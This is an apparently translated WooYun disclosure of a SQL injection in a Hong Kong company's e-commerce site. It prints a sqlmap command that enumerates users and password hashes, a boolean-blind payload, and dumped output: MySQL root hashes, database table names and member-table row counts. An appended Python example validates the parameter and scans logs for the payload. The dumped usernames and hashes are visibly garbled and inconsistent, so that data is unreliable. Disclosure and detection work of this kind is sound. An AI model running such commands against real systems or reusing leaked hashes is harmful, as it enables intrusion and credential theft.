
Vulnerability summary

Defect ID: wooyun-2015-0153411

Title: SQL injection in a 財富聯盟 (Wealth Alliance) page (DBA privileges; root password hashes leaked; 680,000 system log records exposed) (Hong Kong)

Related vendor: 財富聯盟

Author: 路人甲

Submitted: 2015-11-11 10:25

Fixed: 2015-11-24 07:18

Published: 2015-11-24 07:18

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: handed over to a third-party partner organisation (HKCERT, Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-11-11: Details sent to the vendor; awaiting the vendor's response
2015-11-24: The vendor has chosen to ignore the vulnerability; details disclosed to the public

Brief description:

財富聯盟 headquarters: Room 701, 汇达国际大厦 (Huida International Building), Sha Tin, Hong Kong. Tel: 400-6969-185

Detailed description:

URL: http://**.**.**.**/index.php?app=goods&id=10970

python sqlmap.py -u "http://**.**.**.**/index.php?app=goods&id=10970" -p id --technique=B --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: aajflm
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| ecm_jflog | 683675 |

Proof of vulnerability:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: app=goods&id=10970 AND 5156=5156
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
current user: 'root@localhopt'
current user is DBA: True
database management system users [3]:
[*] '`oot'@'localhost'
[*] 'qoot'@'**.**.**.**'
[*] 'root'@'127\x1c0.0.1'
database management system users password hashes:
[*] root [2]:
password hash: *4D264C92FC0238@364FA71BE2B02E197D1F99B91
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1A
Database: aajflm
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| ecm_jflog | 683675 |
| ecm_shop_member | 614218 |
| ecm_spreader_member | 508214 |
| ecm_member | 505737 |
| ecm_member_account | 505560 |
| ecm_jflog2 | 440930 |
| ecm_member1 | 403599 |
| ecm_jflog_copy | 225399 |
| ecm_zsjflog_copy | 216122 |
| ecm_uploaded_file | 47374 |
| ecm_cart | 22750 |
| ecm_sessions_data | 21511 |
| ecm_lottery | 21318 |
| ecm_goods_order_1023 | 19449 |
| ecm_goods_order_1030 | 19395 |
| ecm_category_goods | 18263 |
| ecm_goods_spec | 17196 |
| ecm_goods_image | 16548 |
| ecm_incomeshop | 13301 |
| ecm_order_goods | 12627 |
| ecm_goods_statistics | 12463 |
| ecm_goods | 12448 |
| ecm_order_log | 12356 |
| ecm_incomelog | 12082 |
| ecm_goods_order_ls | 11635 |
| ecm_order_extm | 10816 |
| ecm_poss | 5428 |
| ecm_comment | 4772 |
| ecm_address | 4002 |
| ecm_region_old | 3452 |
| ecm_region | 3413 |
| ecm_poslog | 3394 |
| ecm_region_line | 3384 |
| ecm_myarea | 3142 |
| ecm_financial | 2909 |
| sj_member | 2836 |
| ecm_goods_spec_images | 2817 |
| ecm_message | 2750 |
| ecm_shop_copy | 2304 |
| ecm_gcategory | 1853 |
| ecm_collect | 1554 |
| ecm_cflog | 1358 |
| ecm_shop_10yuan | 1318 |
| ecm_user_cf | 818 |
| ecm_goods_adv | 807 |
| ecm_posmember | 661 |
| ecm_region_bak | 475 |
| ecm_jfrestrictlog | 351 |
| ecm_proposal | 312 |
| ecm_shop_bak | 244 |
| ecm_recommended_goods | 143 |
| ecm_ka_cart | 114 |
| ecm_goods_qa | 95 |
| ecm_user_priv | 69 |
| ecm_shop_ka | 67 |
| ecm_ka_order | 66 |
| ecm_goods_cart | 56 |
| ecm_category_store | 53 |
| ecm_sales | 52 |
| ecm_store | 52 |
| ecm_jflog_bak | 42 |
| ecm_spreader_member_bak | 40 |
| ecm_myprovince | 34 |
| ecm_postal | 34 |
| ecm_ukinds | 28 |
| sj_level | 14 |
| ecm_scategory | 6 |
| ecm_withdrawals | 6 |
| ecm_exchange | 3 |
| ecm_recommend | 3 |
| ecm_scope | 2 |
| ecm_bankcard_record | 1 |
| ecm_pos_shop | 1 |
+-------------------------+---------+
Database: mysql
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| help_relation | 1009 |
| help_topic | 510 |
| help_keyword | 453 |
| `user` | 3 |
+-------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: aajflm
Table: ecm_member
[2 columns]
+-----------+
| Column |
+-----------+
| password |
| tpassword |
+-----------+
Database: aajflm
Table: ecm_member1
[2 columns]
+-----------+
| Column |
+-----------+
| password |
| tpassword |
+-----------+
Database: mysql
Table: user
[1 column]
+----------+
| Column |
+----------+
| Password |
+----------+
Database: mysql
Table: user
[3 entries]
+--------------------------------------------------+
| Password |
+--------------------------------------------------+
| *4D064C92FC0238F364FA71BE2B02E197D1F99B91 |
| *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B (root) |
| *81F5E21E35407D883A6CD4A731AE@FB6AF209E1B |
+--------------------------------------------------+

Remediation:

Deploy a WAF.

Copyright notice: when republishing, please credit the source as 路人甲@乌云
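A WAF only filters what it recognises; the durable fix for the `id` parameter on `index.php?app=goods` is to accept nothing but an integer before it reaches the query. The following is an added example, not code from the report or the affected site: it implements that strict check and runs it as a detection rule over constructed access-log lines, one of which carries the boolean-based blind payload shape (`AND 5156=5156`) sqlmap reported above. The log lines and the parameter list are assumptions for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the report). Line 2 carries the
# tautology payload sqlmap used; line 3 its false counterpart; lines 1 and 4 are normal.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Nov/2015:10:25:01 +0800] "GET /index.php?app=goods&id=10970 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Nov/2015:10:25:02 +0800] "GET /index.php?app=goods&id=10970%20AND%205156%3D5156 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Nov/2015:10:25:03 +0800] "GET /index.php?app=goods&id=10970%20AND%205156%3D5157 HTTP/1.1" 200 4711
203.0.113.5 - - [11/Nov/2015:10:25:04 +0800] "GET /index.php?app=goods&id=10971 HTTP/1.1" 200 5088
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Query parameters the application should only ever receive as integers (assumption).
INTEGER_PARAMS = {"id"}
# Shape of a boolean-based probe: AND/OR followed by a numeric comparison.
TAUTOLOGY_RE = re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.IGNORECASE)


def is_strict_int(value: str) -> bool:
    """The validation the goods handler should apply: ASCII digits only, nothing else."""
    return value.isascii() and value.isdigit()


def flag_request(target: str):
    """Return (param, reason) for the first offending query parameter, else None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)  # percent-decodes
    for name, values in query.items():
        if name not in INTEGER_PARAMS:
            continue
        for value in values:
            if not is_strict_int(value):
                reason = "tautology" if TAUTOLOGY_RE.search(value) else "non-integer"
                return name, reason
    return None


def scan_log(text: str):
    """Return [(line_number, param, reason)] for every flagged request in an access log."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if match and (verdict := flag_request(match.group(1))):
            hits.append((lineno, *verdict))
    return hits


if __name__ == "__main__":
    for lineno, param, reason in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: parameter {param!r} rejected ({reason})")
```

The same `is_strict_int` check, applied server-side before the value is placed in a parameterised query, is what removes the injection; the log scan is the detection counterpart for requests that already went through.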


Vulnerability response

Vendor response:

Severity: No impact; vendor ignored

Ignored at: 2015-11-24 07:18

Vendor reply:

Latest status:

None yet